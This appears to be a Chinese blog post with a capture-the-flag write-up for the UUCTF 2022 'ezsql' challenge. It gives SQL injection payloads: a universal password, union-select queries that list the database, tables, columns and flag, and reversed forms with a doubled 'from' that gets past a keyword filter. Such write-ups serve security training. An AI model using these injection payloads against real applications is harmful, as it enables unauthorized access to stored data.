[UUCTF 2022 新生赛]ezsql

[UUCTF 2022 新生赛]ezsql

先使用万能密码 1’ or 1=1 – - 常规测试,回显中 , or 被过滤, 输入被逆向
所以后面的payload都需要逆向一下

s = "需要逆向的值"
r = s[::-1]
print(r)

查库名:

1') union select 1,database()#

)(esabatad,1 tceles noinu )'1

image-20230627125915629

查表名:

from被过滤了,or 也被过滤, 因为逆向, 由此 from 可以写成 frroom

1') union select 1,table_name frroom information_schema.tables where table_schema='UUCTF' #

'FTCUU'=amehcs_elbat erehw selbat.amehcs_noitamrofni moorrf eman_elbat,1 tceles noinu )'1

image-20230627130318888

查字段名:

1') union select 1,column_name frroom information_schema.columns where table_name='flag'#

'galf'=eman_elbat erehw snmuloc.amehcs_noitamrofni moorrf eman_nmuloc,1 tceles noinu )'1

image-20230627130559452

查字段值:

1') union select 1,UUCTF frroom flag#

galf moorrf FTCUU,1 tceles noinu )'1

image-20230627130702467

posted @ 2023-06-27 13:13  Magic水瓶  阅读(447)  评论(0)    收藏  举报